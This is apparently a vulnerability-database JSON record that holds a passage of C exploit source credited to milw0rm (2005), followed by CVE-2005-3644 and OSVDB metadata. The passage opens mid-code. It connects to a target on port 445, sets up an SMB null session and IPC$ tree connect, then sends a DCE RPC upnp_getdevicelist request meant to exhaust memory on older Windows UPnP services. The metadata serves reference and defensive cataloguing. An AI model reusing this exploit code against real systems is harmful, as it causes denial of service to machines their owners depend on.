argv[1]);\n\thost = gethostbyname(argv[1]);\n\tif (!host) {\n\t\tprintf(\"\\033[0;31mFailed\\033[0;39m\\n\");\n\t\texit(-1);\n\t}\n\tprintf(\"\\033[0;32mOK\\033[0;39m\\n\");\n\t\n\ttarget.sin_family = AF_INET;\n\ttarget.sin_addr = *(struct in_addr *)host->h_addr;\n\ttarget.sin_port = htons(445);\n\tsprintf(targetIP, \"%s\", inet_ntoa(target.sin_addr));\n\t\n\tsockfd = socket(AF_INET, SOCK_STREAM, 0);\n\tret = connect(sockfd, (struct sockaddr *)&target, sizeof(target));\n\tif (ret < 0) {\n\t\tperror(\"Connect\");\n\t\texit(-1);\n\t}\n\n\tsend_packet(sockfd, peer0_0, sizeof(peer0_0) -1, \"Sending SMB Negotiate request\");\n\tget_response(sockfd, \"SMB Negotiate\");\t\n\n\tsend_packet(sockfd, peer0_1, sizeof(peer0_1) -1, \"Sending Null Session request\");\n\tget_response(sockfd, \"Null Session request 1\");\n\n\tsend_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, \"Sending Null Session request\");\n\tget_response(sockfd, \"Null Session request 2\");\n\n\tbzero(tConXpacket, 150);\n\ttemp = tConXpacket;\n\tmemcpy(tConXpacket, peer0_2, sizeof(peer0_2));\n\ttemp += sizeof(peer0_2) -1;\n\tsprintf(UNC, \"\\\\\\\\%s\\\\IPC$\", targetIP);\n\tsetup_tCon(UNC, temp);\n\ttemplen = (strlen(UNC)*2) +9;\n\ttConXpacket[3] = 43 + templen;\n\ttemplen -= 2;\n\tmemcpy((unsigned long *)&tConXpacket[45], &templen, 1);\n\n\tsend_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen, \"Sending Tree Connect request\");\n\tget_response(sockfd, \"Tree Connect\");\n\n\tsend_packet(sockfd, peer0_3, sizeof(peer0_3) -1, \"Sending NT Creat AndX request\");\n\tget_response(sockfd, \"NT Creat AndX\");\n\n\tsend_packet(sockfd, peer0_4, sizeof(peer0_4) -1, \"Sending DCE RPC Bind UPNPMGR request\");\n\tget_response(sockfd, \"DCE RPC Bind UPNPMGR\");\n\n\tsend_packet(sockfd, peer0_5, sizeof(peer0_5) -1, \"UPNPMGR upnp_getdevicelist request\");\n\tget_response(sockfd, \"UPNPMGR upnp_getdevicelist\");\n\n\tclose(sockfd);\n}\n\n// milw0rm.com [2005-11-16]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2005-3644", "type": "cve", "title": "CVE-2005-3644", "description": "PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120.", "published": "2005-11-17T06:02:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3644", "cvelist": ["CVE-2005-3644"], "lastseen": "2018-05-06T20:31:20"}], "osvdb": [{"id": "OSVDB:20916", "type": "osvdb", "title": "Microsoft Windows UPnP GetDeviceList Remote DoS", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1015233\n[Secunia Advisory ID:17595](https://secuniaresearch.flexerasoftware.com/advisories/17595/)\nOther Advisory URL: http://www.microsoft.com/technet/security/advisory/911052.mspx\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2005-q4/0038.html\nMail List Post: http://archives.neohapsis.com/archives/dailydave/2005-q4/0169.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2005-q4/0039.html\nISS X-Force ID: 23066\n[CVE-2005-3644](https://vulners.com/cve/CVE-2005-3644)\nBugtraq ID: 15460\n", "published": "2005-11-13T09:33:27", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:20916", "cvelist": ["CVE-2005-3644"], "lastseen": "2017-04-28T13:20:17"}]}}
